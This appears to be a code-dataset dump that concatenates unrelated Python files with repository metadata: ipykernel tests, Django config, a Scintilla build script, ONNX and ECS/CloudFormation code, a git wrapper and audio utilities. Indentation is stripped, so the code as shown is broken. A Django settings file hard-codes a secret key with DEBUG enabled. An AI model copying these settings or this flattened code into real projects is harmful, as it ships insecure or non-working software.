new_attributes[attrib_name] = descriptors.HasFieldDescriptor(attrib_name)
else:
new_attributes[attrib_name] = attribute
return super(ModelMeta, cls).__new__(cls, name, based, new_attributes)
'''
This class is contructed by metaclass and in its contructor all the class contructors
are copied so the instances wouldn't be only references to each other.
'''
class BaseMetaModel(object, metaclass=ModelMeta):
def __init__(self, *args, **kwargs):
self._self = self
#super(BaseMetaModel, self).__init__()
for field in self.fields:
setattr(self, '_'+field, copy.deepcopy(getattr(self, '_'+field)))
for metafield in self.metafields:
setattr(self, '_'+metafield, copy.copy(getattr(self, '_'+metafield)))
f = getattr(self, '_'+metafield)
self.setFieldModel(f)
def setFieldModel(self, f):
f.setModel(self)
| 35.360656
| 100
| 0.749189
|
794ff6c96f42878f3980d36575e533c3821fed9b
| 3,335
|
py
|
Python
|
env/lib/python3.5/site-packages/ipykernel/tests/test_jsonutil.py
|
riordan/who-owns-what
|
62538fdb6d40ed1e0cdafb0df388be95fb388907
|
[
"Apache-2.0"
] | 4
|
2018-01-19T17:15:06.000Z
|
2018-01-24T00:06:42.000Z
|
ipykernel/tests/test_jsonutil.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 10
|
2017-07-13T00:24:03.000Z
|
2017-07-17T07:39:03.000Z
|
ipykernel/tests/test_jsonutil.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 7
|
2017-08-01T04:02:07.000Z
|
2018-10-06T21:07:20.000Z
|
# coding: utf-8
"""Test suite for our JSON utilities."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import json
import sys
if sys.version_info < (3,):
from base64 import decodestring as decodebytes
else:
from base64 import decodebytes
from datetime import datetime
import numbers
import nose.tools as nt
from .. import jsonutil
from ..jsonutil import json_clean, encode_images
from ipython_genutils.py3compat import unicode_to_str, str_to_bytes, iteritems
class MyInt(object):
def __int__(self):
return 389
numbers.Integral.register(MyInt)
class MyFloat(object):
def __float__(self):
return 3.14
numbers.Real.register(MyFloat)
def test():
# list of input/expected output. Use None for the expected output if it
# can be the same as the input.
pairs = [(1, None), # start with scalars
(1.0, None),
('a', None),
(True, None),
(False, None),
(None, None),
# Containers
([1, 2], None),
((1, 2), [1, 2]),
(set([1, 2]), [1, 2]),
(dict(x=1), None),
({'x': 1, 'y':[1,2,3], '1':'int'}, None),
# More exotic objects
((x for x in range(3)), [0, 1, 2]),
(iter([1, 2]), [1, 2]),
(datetime(1991, 7, 3, 12, 00), "1991-07-03T12:00:00.000000"),
(MyFloat(), 3.14),
(MyInt(), 389)
]
for val, jval in pairs:
if jval is None:
jval = val
out = json_clean(val)
# validate our cleanup
nt.assert_equal(out, jval)
# and ensure that what we return, indeed encodes cleanly
json.loads(json.dumps(out))
def test_encode_images():
# invalid data, but the header and footer are from real files
pngdata = b'\x89PNG\r\n\x1a\nblahblahnotactuallyvalidIEND\xaeB`\x82'
jpegdata = b'\xff\xd8\xff\xe0\x00\x10JFIFblahblahjpeg(\xa0\x0f\xff\xd9'
pdfdata = b'%PDF-1.\ntrailer<</Root<</Pages<</Kids[<</MediaBox[0 0 3 3]>>]>>>>>>'
fmt = {
'image/png' : pngdata,
'image/jpeg' : jpegdata,
'application/pdf' : pdfdata
}
encoded = encode_images(fmt)
for key, value in iteritems(fmt):
# encoded has unicode, want bytes
decoded = decodebytes(encoded[key].encode('ascii'))
nt.assert_equal(decoded, value)
encoded2 = encode_images(encoded)
nt.assert_equal(encoded, encoded2)
b64_str = {}
for key, encoded in iteritems(encoded):
b64_str[key] = unicode_to_str(encoded)
encoded3 = encode_images(b64_str)
nt.assert_equal(encoded3, b64_str)
for key, value in iteritems(fmt):
# encoded3 has str, want bytes
decoded = decodebytes(str_to_bytes(encoded3[key]))
nt.assert_equal(decoded, value)
def test_lambda():
with nt.assert_raises(ValueError):
json_clean(lambda : 1)
def test_exception():
bad_dicts = [{1:'number', '1':'string'},
{True:'bool', 'True':'string'},
]
for d in bad_dicts:
nt.assert_raises(ValueError, json_clean, d)
def test_unicode_dict():
data = {u'üniço∂e': u'üniço∂e'}
clean = jsonutil.json_clean(data)
nt.assert_equal(data, clean)
| 29.254386
| 85
| 0.592504
|
794ff983897603df7d758424f71cf9f82fdac15e
| 428
|
py
|
Python
|
config/urls.py
|
Mohammad-Abdul-Ghafour/DjangoX-project
|
f84e0ee9b8092ab2384106248f8943f99a614c63
|
[
"MIT"
] | null | null | null |
config/urls.py
|
Mohammad-Abdul-Ghafour/DjangoX-project
|
f84e0ee9b8092ab2384106248f8943f99a614c63
|
[
"MIT"
] | null | null | null |
config/urls.py
|
Mohammad-Abdul-Ghafour/DjangoX-project
|
f84e0ee9b8092ab2384106248f8943f99a614c63
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('accounts/', include('allauth.urls')),
path('page/', include('pages.urls')),
path('', include('emplyees.urls')),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
path('__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
| 25.176471
| 56
| 0.67757
|
794ffaa8238503940fa20d88ac77a32dc0791793
| 6,904
|
py
|
Python
|
dep/scintilla/scintilla-3.21.0/scripts/LexGen.py
|
Matt-Soft/gitahead
|
4be5639202b1354cbe244cd37db90efabb5106b8
|
[
"MIT"
] | 1,626
|
2018-12-15T12:07:00.000Z
|
2022-03-31T15:08:04.000Z
|
dep/scintilla/scintilla-3.21.0/scripts/LexGen.py
|
Matt-Soft/gitahead
|
4be5639202b1354cbe244cd37db90efabb5106b8
|
[
"MIT"
] | 541
|
2018-12-10T21:33:40.000Z
|
2022-03-25T02:25:02.000Z
|
dep/scintilla/scintilla-3.21.0/scripts/LexGen.py
|
Matt-Soft/gitahead
|
4be5639202b1354cbe244cd37db90efabb5106b8
|
[
"MIT"
] | 270
|
2018-12-27T21:37:26.000Z
|
2022-03-31T23:00:06.000Z
|
#!/usr/bin/env python
# LexGen.py - implemented 2002 by Neil Hodgson neilh@scintilla.org
# Released to the public domain.
# Regenerate the Scintilla source files that list all the lexers.
# Should be run whenever a new lexer is added or removed.
# Requires Python 2.5 or later
# Files are regenerated in place with templates stored in comments.
# The format of generation comments is documented in FileGenerator.py.
from FileGenerator import Regenerate, UpdateLineInFile, \
ReplaceREInFile, UpdateLineInPlistFile, ReadFileAsList, UpdateFileFromLines, \
FindSectionInList
import ScintillaData
import HFacer
import os
import uuid
import sys
baseDirectory = os.path.dirname(os.path.dirname(ScintillaData.__file__))
sys.path.insert(0, baseDirectory)
import win32.DepGen
import gtk.DepGen
def UpdateVersionNumbers(sci, root):
UpdateLineInFile(root + "win32/ScintRes.rc", "#define VERSION_SCINTILLA",
"#define VERSION_SCINTILLA \"" + sci.versionDotted + "\"")
UpdateLineInFile(root + "win32/ScintRes.rc", "#define VERSION_WORDS",
"#define VERSION_WORDS " + sci.versionCommad)
UpdateLineInFile(root + "qt/ScintillaEditBase/ScintillaEditBase.pro",
"VERSION =",
"VERSION = " + sci.versionDotted)
UpdateLineInFile(root + "qt/ScintillaEdit/ScintillaEdit.pro",
"VERSION =",
"VERSION = " + sci.versionDotted)
UpdateLineInFile(root + "doc/ScintillaDownload.html", " Release",
" Release " + sci.versionDotted)
ReplaceREInFile(root + "doc/ScintillaDownload.html",
r"(/sourceforge.net/projects/scintilla/files/scintilla/)[\d\.]+(/[a-zA-Z]+)\d+",
r"\g<1>" + sci.versionDotted + "\g<2>" + sci.version)
UpdateLineInFile(root + "doc/index.html",
' <font color="#FFCC99" size="3"> Release version',
' <font color="#FFCC99" size="3"> Release version ' +\
sci.versionDotted + '<br />')
UpdateLineInFile(root + "doc/index.html",
' Site last modified',
' Site last modified ' + sci.mdyModified + '</font>')
ReplaceREInFile(root + "doc/ScintillaHistory.html",
r"(/sourceforge.net/projects/scintilla/files/scintilla/)[\d\.]+(/[a-zA-Z]+)\d+",
r"\g<1>" + sci.versionDotted + "\g<2>" + sci.version,
count=1)
ReplaceREInFile(root + "doc/ScintillaHistory.html",
r">Release [\d\.]+<", ">Release " + sci.versionDotted + "<", count=1)
UpdateLineInFile(root + "doc/ScintillaHistory.html",
' Released ',
' Released ' + sci.dmyModified + '.')
UpdateLineInPlistFile(root + "cocoa/ScintillaFramework/Info.plist",
"CFBundleVersion", sci.versionDotted)
UpdateLineInPlistFile(root + "cocoa/ScintillaFramework/Info.plist",
"CFBundleShortVersionString", sci.versionDotted)
UpdateLineInFile(root + "LongTermDownload.html", " Release",
" Release " + sci.versionDotted)
ReplaceREInFile(root + "LongTermDownload.html",
r"(/sourceforge.net/projects/scintilla/files/scintilla/)[\d\.]+(/[a-zA-Z]+)\d+",
r"\g<1>" + sci.versionDotted + "\g<2>" + sci.version)
# Last 24 digits of UUID, used for item IDs in Xcode
def uid24():
return str(uuid.uuid4()).replace("-", "").upper()[-24:]
def ciLexerKey(a):
return a.split()[2].lower()
"""
11F35FDB12AEFAF100F0236D /* LexA68k.cxx in Sources */ = {isa = PBXBuildFile; fileRef = 11F35FDA12AEFAF100F0236D /* LexA68k.cxx */; };
11F35FDA12AEFAF100F0236D /* LexA68k.cxx */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; name = LexA68k.cxx; path = ../../lexers/LexA68k.cxx; sourceTree = SOURCE_ROOT; };
11F35FDA12AEFAF100F0236D /* LexA68k.cxx */,
11F35FDB12AEFAF100F0236D /* LexA68k.cxx in Sources */,
"""
def RegenerateXcodeProject(path, lexers, lexerReferences):
# Build 4 blocks for insertion:
# Each markers contains a unique section start, an optional wait string, and a section end
markersPBXBuildFile = ["Begin PBXBuildFile section", "", "End PBXBuildFile section"]
sectionPBXBuildFile = []
markersPBXFileReference = ["Begin PBXFileReference section", "", "End PBXFileReference section"]
sectionPBXFileReference = []
markersLexers = ["/* Lexers */ =", "children", ");"]
sectionLexers = []
markersPBXSourcesBuildPhase = ["Begin PBXSourcesBuildPhase section", "files", ");"]
sectionPBXSourcesBuildPhase = []
for lexer in lexers:
if lexer not in lexerReferences:
uid1 = uid24()
uid2 = uid24()
print("Lexer", lexer, "is not in Xcode project. Use IDs", uid1, uid2)
lexerReferences[lexer] = [uid1, uid2]
linePBXBuildFile = "\t\t{} /* {}.cxx in Sources */ = {{isa = PBXBuildFile; fileRef = {} /* {}.cxx */; }};".format(uid1, lexer, uid2, lexer)
linePBXFileReference = "\t\t{} /* {}.cxx */ = {{isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; name = {}.cxx; path = ../../lexers/{}.cxx; sourceTree = SOURCE_ROOT; }};".format(uid2, lexer, lexer, lexer)
lineLexers = "\t\t\t\t{} /* {}.cxx */,".format(uid2, lexer)
linePBXSourcesBuildPhase = "\t\t\t\t{} /* {}.cxx in Sources */,".format(uid1, lexer)
sectionPBXBuildFile.append(linePBXBuildFile)
sectionPBXFileReference.append(linePBXFileReference)
sectionLexers.append(lineLexers)
sectionPBXSourcesBuildPhase.append(linePBXSourcesBuildPhase)
lines = ReadFileAsList(path)
sli = FindSectionInList(lines, markersPBXBuildFile)
lines[sli.stop:sli.stop] = sectionPBXBuildFile
sli = FindSectionInList(lines, markersPBXFileReference)
lines[sli.stop:sli.stop] = sectionPBXFileReference
sli = FindSectionInList(lines, markersLexers)
# This section is shown in the project outline so sort it to make it easier to navigate.
allLexers = sorted(lines[sli.start:sli.stop] + sectionLexers, key=ciLexerKey)
lines[sli] = allLexers
sli = FindSectionInList(lines, markersPBXSourcesBuildPhase)
lines[sli.stop:sli.stop] = sectionPBXSourcesBuildPhase
UpdateFileFromLines(path, lines, "\n")
def RegenerateAll(root):
scintillaBase = os.path.abspath(root)
sci = ScintillaData.ScintillaData(root)
Regenerate(root + "src/Catalogue.cxx", "//", sci.lexerModules)
Regenerate(root + "win32/scintilla.mak", "#", sci.lexFiles)
startDir = os.getcwd()
os.chdir(os.path.join(scintillaBase, "win32"))
win32.DepGen.Generate()
os.chdir(os.path.join(scintillaBase, "gtk"))
gtk.DepGen.Generate()
os.chdir(startDir)
RegenerateXcodeProject(root + "cocoa/ScintillaFramework/ScintillaFramework.xcodeproj/project.pbxproj",
sci.lexFiles, sci.lexersXcode)
UpdateVersionNumbers(sci, root)
HFacer.RegenerateAll(root, False)
if __name__=="__main__":
RegenerateAll("../")
| 44.541935
| 249
| 0.671495
|
794ffd81bf08d9b067f88d06e2115a9372f9cba9
| 3,611
|
py
|
Python
|
src/test_onnx.py
|
kkourt/cmnnc
|
965e8150ab50c19237dbf4afd2e62bca1f5d53c8
|
[
"BSD-3-Clause"
] | 8
|
2020-04-08T04:27:22.000Z
|
2022-01-02T08:21:07.000Z
|
src/test_onnx.py
|
kkourt/cmnnc
|
965e8150ab50c19237dbf4afd2e62bca1f5d53c8
|
[
"BSD-3-Clause"
] | null | null | null |
src/test_onnx.py
|
kkourt/cmnnc
|
965e8150ab50c19237dbf4afd2e62bca1f5d53c8
|
[
"BSD-3-Clause"
] | 5
|
2020-02-05T11:59:38.000Z
|
2021-12-07T07:14:14.000Z
|
# Copyright (c) 2019-2020, IBM Research.
#
# Author: Kornilios Kourtis <kou@zurich.ibm.com>
#
# vim: set expandtab softtabstop=4 tabstop=4 shiftwidth=4:
import typing
import dataclasses as dc
from pprint import pprint
import numpy as np
import onnxruntime as onnxrt
import onnx
import conv
import pipeline as pl
from onnx_test_models import mk_simple_residual as onnx_mk_simple_residual
from onnx_util import onnx_rand_input
from onnx_graph import OnnxGraph
def test_onnx_residual_2d():
# Create the following ONNX graph
# (this is what onnx_mk_simple_residual does)
#
# CONV2D ---> CONV2D ---> ADD
# | ^
# | |
# +--------------- +
#
# CONV2D
# input: in
# output: v1
# weights: w1
# CONV2D
# input: v1
# output: v2
# weights: w2
# ADD
# input: v1,v2
# output: out
conv1_padding = 1
conv2_padding = 1
conv1_ps = conv.Conv2DParams(
i=conv.Conv2DInParams(w=32, h=32, d=3),
f=conv.Conv2DFiltParams(w=3, h=3, d=3, l=1),
p=conv1_padding,
p_out=conv2_padding,
s=1,
)
conv2_ps = conv.Conv2DParams(
i=conv1_ps.o.to_in(),
f=conv.Conv2DFiltParams(w=3, h=3, d=conv1_ps.f.l, l=1),
p=conv2_padding,
p_out=0,
s=1,
)
# create simple model with residual path
onnx_m = onnx_mk_simple_residual(conv1_ps, conv2_ps)
# create random input
inp = onnx_rand_input(onnx_m)
# Execute using onnxruntime
onnx.save(onnx_m, "simple_residual_2d.onnx")
sess = onnxrt.InferenceSession("simple_residual_2d.onnx")
out = sess.run(None, inp)
# Parse onnx graph, and create a pipeline
graph = OnnxGraph(onnx_m)
pprint(graph.partitions)
pline = graph.get_pipeline()
# set inputs
for (inp_name, inp_data) in inp.items():
obj_info = graph.objs_info[inp_name]
assert inp_data.shape == (1,) + obj_info.shape # NB: batching
# data = np.random.rand(*obj_info.shape)
data = inp_data[0]
data = np.pad(data, obj_info.padding)
obj = pline.get_object(inp_name)
obj[...] = data
# Execute the pipeline
print_info = False
for iters in pline.tick_gen():
if print_info:
print("*" * 80)
for (s, i) in iters.items():
if print_info:
print("%s: %s" % (s, i))
if print_info:
print("*" * 80)
print("%s> DONE" % ("-" * 30,))
# Get pipeline results
pline_out = pline.get_object("out")
pline_v1 = pline.get_object("v1")
pline_v2 = pline.get_object("v2")
# Execute using manual ops
in_m = np.pad(inp["in"][0], graph.objs_info["in"].padding)
w1_m = np.array(graph.init_tvs["w1"].float_data).reshape(
conv1_ps.get_filters_shape()
)
v1_m = conv.conv2d_simple(in_m, w1_m, conv1_ps)
v1_m = np.pad(v1_m, graph.objs_info["v1"].padding)
np.testing.assert_allclose(
v1_m, pline_v1, err_msg="pipeline v1 does not match manual v1"
)
w2_m = np.array(graph.init_tvs["w2"].float_data).reshape(
conv2_ps.get_filters_shape()
)
v2_m = conv.conv2d_simple(v1_m, w2_m, conv2_ps)
v2_m = np.pad(v2_m, graph.objs_info["v2"].padding)
np.testing.assert_allclose(
v2_m, pline_v2, err_msg="pipeline v2 does not match manual v2"
)
np.testing.assert_allclose(
out[0][0, :], pline_out, err_msg="OUT does not match", rtol=1e-06
)
return graph
if __name__ == "__main__":
ret = test_onnx_residual_2d()
| 27.150376
| 74
| 0.609526
|
794ffe7c25991b4b9d159eff214d7f8c84fbc886
| 72
|
py
|
Python
|
modbus_tcp_server/data_source/__init__.py
|
smok-serwis/modbus-tcp-server
|
558eca908b6762280a74b16d78d56dc047a9dace
|
[
"MIT"
] | null | null | null |
modbus_tcp_server/data_source/__init__.py
|
smok-serwis/modbus-tcp-server
|
558eca908b6762280a74b16d78d56dc047a9dace
|
[
"MIT"
] | null | null | null |
modbus_tcp_server/data_source/__init__.py
|
smok-serwis/modbus-tcp-server
|
558eca908b6762280a74b16d78d56dc047a9dace
|
[
"MIT"
] | null | null | null |
from .base import BaseDataSource
from .testing import TestingDataSource
| 24
| 38
| 0.861111
|
794ffedfb7b99f73279d7608665beabb55738339
| 5,386
|
py
|
Python
|
templates/ecs.py
|
skyer9/CloudFormationForPython
|
6b5e1de4336a0ba9b0899a3cd7c83e08d24b078e
|
[
"MIT"
] | 1
|
2019-02-18T06:45:36.000Z
|
2019-02-18T06:45:36.000Z
|
templates/ecs.py
|
skyer9/CloudFormationForPython
|
6b5e1de4336a0ba9b0899a3cd7c83e08d24b078e
|
[
"MIT"
] | null | null | null |
templates/ecs.py
|
skyer9/CloudFormationForPython
|
6b5e1de4336a0ba9b0899a3cd7c83e08d24b078e
|
[
"MIT"
] | 1
|
2019-02-18T06:45:41.000Z
|
2019-02-18T06:45:41.000Z
|
from troposphere import (
AWS_ACCOUNT_ID,
AWS_REGION,
Equals,
GetAtt,
iam,
Join,
logs,
Not,
Output,
Ref,
Template,
ImportValue, Sub)
from troposphere.ecs import (
ContainerDefinition,
DeploymentConfiguration,
Environment,
LoadBalancer,
LogConfiguration,
PortMapping,
Service,
TaskDefinition,
)
from configuration import (
stack_base_name,
application_revision,
secret_key,
web_worker_cpu,
web_worker_memory,
web_worker_desired_count,
deploy_condition,
web_worker_port,
api_domain_name,
)
repository = ImportValue(Sub(stack_base_name + '-ecr-Repository'))
assets_bucket = ImportValue(Sub(stack_base_name + '-assets-AssetsBucket'))
distribution = ImportValue(Sub(stack_base_name + '-assets-Distribution'))
db_instance = ImportValue(Sub(stack_base_name + '-rds-MySQLInstance'))
jdbc_connection_string = ImportValue(Sub(stack_base_name + '-rds-JDBCConnectionString'))
cluster = ImportValue(Sub(stack_base_name + '-cluster-Cluster'))
application_target_group = ImportValue(Sub(stack_base_name + '-cluster-ApplicationTargetGroup'))
template = Template()
template.add_condition(deploy_condition, Not(Equals(application_revision, "")))
image = Join("", [
Ref(AWS_ACCOUNT_ID),
".dkr.ecr.",
Ref(AWS_REGION),
".amazonaws.com/",
repository,
":",
application_revision,
])
web_log_group = logs.LogGroup(
"WebLogs",
template=template,
RetentionInDays=365,
DeletionPolicy="Retain",
)
log_configuration = LogConfiguration(
LogDriver="awslogs",
Options={
'awslogs-group': Ref(web_log_group),
'awslogs-region': Ref(AWS_REGION),
}
)
# ECS task
web_task_definition = TaskDefinition(
"WebTask",
template=template,
Condition=deploy_condition,
ContainerDefinitions=[
ContainerDefinition(
Name="WebWorker",
# 1024 is full CPU
Cpu=web_worker_cpu,
Memory=web_worker_memory,
Essential=True,
Image=Join("", [
Ref(AWS_ACCOUNT_ID),
".dkr.ecr.",
Ref(AWS_REGION),
".amazonaws.com/",
repository,
":",
application_revision,
]),
PortMappings=[PortMapping(
HostPort=0,
ContainerPort=web_worker_port,
)],
LogConfiguration=LogConfiguration(
LogDriver="awslogs",
Options={
'awslogs-group': Ref(web_log_group),
'awslogs-region': Ref(AWS_REGION),
}
),
Environment=[
Environment(
Name="AWS_STORAGE_BUCKET_NAME",
Value=assets_bucket,
),
Environment(
Name="CDN_DOMAIN_NAME",
Value=distribution,
),
Environment(
Name="DOMAIN_NAME",
Value=api_domain_name,
),
Environment(
Name="PORT",
Value=web_worker_port,
),
Environment(
Name="SECRET_KEY",
Value=secret_key,
),
Environment(
Name="DATABASE_URL",
Value=jdbc_connection_string,
),
],
)
],
)
application_service_role = iam.Role(
"ApplicationServiceRole",
template=template,
AssumeRolePolicyDocument=dict(Statement=[dict(
Effect="Allow",
Principal=dict(Service=["ecs.amazonaws.com"]),
Action=["sts:AssumeRole"],
)]),
Path="/",
Policies=[
iam.Policy(
PolicyName="WebServicePolicy",
PolicyDocument=dict(
Statement=[dict(
Effect="Allow",
Action=[
"elasticloadbalancing:Describe*",
"elasticloadbalancing:RegisterTargets",
"elasticloadbalancing:DeregisterTargets",
"elasticloadbalancing"
":DeregisterInstancesFromLoadBalancer",
"elasticloadbalancing"
":RegisterInstancesWithLoadBalancer",
"ec2:Describe*",
"ec2:AuthorizeSecurityGroupIngress",
],
Resource="*",
)],
),
),
]
)
application_service = Service(
"ApplicationService",
template=template,
Cluster=cluster,
Condition=deploy_condition,
DeploymentConfiguration=DeploymentConfiguration(
MaximumPercent=135,
MinimumHealthyPercent=30,
),
DesiredCount=web_worker_desired_count,
LoadBalancers=[LoadBalancer(
ContainerName="WebWorker",
ContainerPort=web_worker_port,
TargetGroupArn=application_target_group,
)],
TaskDefinition=Ref(web_task_definition),
Role=Ref(application_service_role),
)
template.add_output(Output(
"WebLogsGroup",
Description="Web application log group",
Value=GetAtt(web_log_group, "Arn")
))
def get():
return template.to_yaml()
| 27.20202
| 96
| 0.559599
|
794fff4b71d33e1c96ffa24f861e9070e1f0c40a
| 3,714
|
py
|
Python
|
changes/vcs/git.py
|
alex/changes
|
69a17b4c639e7082a75d037384ccb68ead3a0b4b
|
[
"Apache-2.0"
] | 1
|
2015-11-08T13:00:44.000Z
|
2015-11-08T13:00:44.000Z
|
changes/vcs/git.py
|
alex/changes
|
69a17b4c639e7082a75d037384ccb68ead3a0b4b
|
[
"Apache-2.0"
] | null | null | null |
changes/vcs/git.py
|
alex/changes
|
69a17b4c639e7082a75d037384ccb68ead3a0b4b
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import, division, print_function
from datetime import datetime
from urlparse import urlparse
from changes.utils.cache import memoize
from .base import Vcs, RevisionResult, BufferParser, CommandError
LOG_FORMAT = '%H\x01%an <%ae>\x01%at\x01%cn <%ce>\x01%ct\x01%P\x01%B\x02'
ORIGIN_PREFIX = 'remotes/origin/'
class LazyGitRevisionResult(RevisionResult):
def __init__(self, vcs, *args, **kwargs):
self.vcs = vcs
super(LazyGitRevisionResult, self).__init__(*args, **kwargs)
@memoize
def branches(self):
return self.vcs.branches_for_commit(self.id)
class GitVcs(Vcs):
binary_path = 'git'
def get_default_env(self):
return {
'GIT_SSH': self.ssh_connect_path,
}
def get_default_revision(self):
return 'master'
@property
def remote_url(self):
if self.url.startswith(('ssh:', 'http:', 'https:')):
parsed = urlparse(self.url)
url = '%s://%s@%s/%s' % (
parsed.scheme,
parsed.username or self.username or 'git',
parsed.hostname + (':%s' % (parsed.port,) if parsed.port else ''),
parsed.path.lstrip('/'),
)
else:
url = self.url
return url
def branches_for_commit(self, id):
results = []
output = self.run(['branch', '-a', '--contains', id])
for result in output.splitlines():
# HACK(dcramer): is there a better way around removing the prefix?
result = result[2:].strip()
if result.startswith(ORIGIN_PREFIX):
result = result[len(ORIGIN_PREFIX):]
if result == 'HEAD':
continue
results.append(result)
return list(set(results))
def run(self, cmd, **kwargs):
cmd = [self.binary_path] + cmd
return super(GitVcs, self).run(cmd, **kwargs)
def clone(self):
self.run(['clone', '--mirror', self.remote_url, self.path])
def update(self):
self.run(['fetch', '--all'])
def log(self, parent=None, offset=0, limit=100):
# TODO(dcramer): we should make this streaming
cmd = ['log', '--all', '--pretty=format:%s' % (LOG_FORMAT,)]
if parent:
cmd.append(parent)
if offset:
cmd.append('--skip=%d' % (offset,))
if limit:
cmd.append('--max-count=%d' % (limit,))
result = self.run(cmd)
for chunk in BufferParser(result, '\x02'):
(sha, author, author_date, committer, committer_date,
parents, message) = chunk.split('\x01')
# sha may have a trailing newline due to git log adding it
sha = sha.lstrip('\n')
parents = filter(bool, parents.split(' '))
author_date = datetime.utcfromtimestamp(float(author_date))
committer_date = datetime.utcfromtimestamp(float(committer_date))
yield LazyGitRevisionResult(
vcs=self,
id=sha,
author=author,
committer=committer,
author_date=author_date,
committer_date=committer_date,
parents=parents,
message=message,
)
def export(self, id):
cmd = ['log', '-n 1', '-p', '--pretty="%b"', id]
result = self.run(cmd)[4:]
return result
def is_child_parent(self, child_in_question, parent_in_question):
cmd = ['merge-base', '--is-ancestor', parent_in_question, child_in_question]
try:
self.run(cmd)
return True
except CommandError:
return False
| 31.210084
| 84
| 0.562466
|
794fff5d828446d85cceda6a506d45b8c0eec90c
| 1,920
|
py
|
Python
|
utils.py
|
Team-Audio/audio_overlay_tool
|
92e7a1b222cf16227448f03230d9aca61ae44182
|
[
"MIT"
] | null | null | null |
utils.py
|
Team-Audio/audio_overlay_tool
|
92e7a1b222cf16227448f03230d9aca61ae44182
|
[
"MIT"
] | null | null | null |
utils.py
|
Team-Audio/audio_overlay_tool
|
92e7a1b222cf16227448f03230d9aca61ae44182
|
[
"MIT"
] | null | null | null |
import asyncio
import os
from typing import AnyStr, Dict
from pydub import AudioSegment
from pathlib import Path
def is_file_in_dir(file: AnyStr, directory: AnyStr) -> bool:
"""
same as os.path.isfile but with a cwd
:param file: the file you want to check
:param directory: the directory that the file lives in
:return: True if the file exists
"""
return os.path.isfile(os.path.join(directory, file))
def merge_audio(a, *rest, out) -> None:
"""
Merges two or more audio files
:param a: the path to the base file
:param rest: the paths to the other files you want to overlay
:param out: the path to save the new file under
"""
# open samples
start = AudioSegment.from_file(a)
others = [AudioSegment.from_file(x) for x in rest]
# keep overlaying
for other in others:
start = start.overlay(other)
# export final audio
start.export(out, format='wav')
def ensure_folder(path: AnyStr) -> None:
"""
Makes sure that a folder and all its parents exist
"""
Path(path).mkdir(parents=True, exist_ok=True)
def num_to_char_lut(num: int) -> str:
"""
Translates a number to the corresponding character in the alphabet
0->a
1->b
2->c etc..
"""
lut = "abcdefghijklmnopqrstuvwxyz"
return lut[num]
def build_pattern(match_dict: Dict[str, str], pattern: str) -> str:
"""
Collapses a dictionary into a string based on the keys
For example:
match_dict = { 'a' : 'c' }
pattern = 'abc'
result = 'cbc'
:return:
"""
p = pattern
for key, value in match_dict.items():
p = p.replace(key, value)
return p
def background(f):
def wrapped(*args, **kwargs):
return asyncio.get_event_loop().run_in_executor(None, f, *args, **kwargs)
return wrapped
| 23.414634
| 82
| 0.616667
|
794fff6c8e2fabdda895cec4c280526cfa2d2856
| 3,514
|
py
|
Python
|
authapp/authapp/settings.py
|
janakhpon/django-auth
|
4e19f68b7b9a19a7fc2c0649f0938e0926cced0a
|
[
"MIT"
] | null | null | null |
authapp/authapp/settings.py
|
janakhpon/django-auth
|
4e19f68b7b9a19a7fc2c0649f0938e0926cced0a
|
[
"MIT"
] | null | null | null |
authapp/authapp/settings.py
|
janakhpon/django-auth
|
4e19f68b7b9a19a7fc2c0649f0938e0926cced0a
|
[
"MIT"
] | null | null | null |
"""
Django settings for authapp project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'j$cr3nnzcerjx2yd_twznu$h2n)q9^_t-#3kthbtpsv7_(_gw&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'authapp.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'authapp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
]
AUTH_PASSWORD_VALIDATORS = [
{
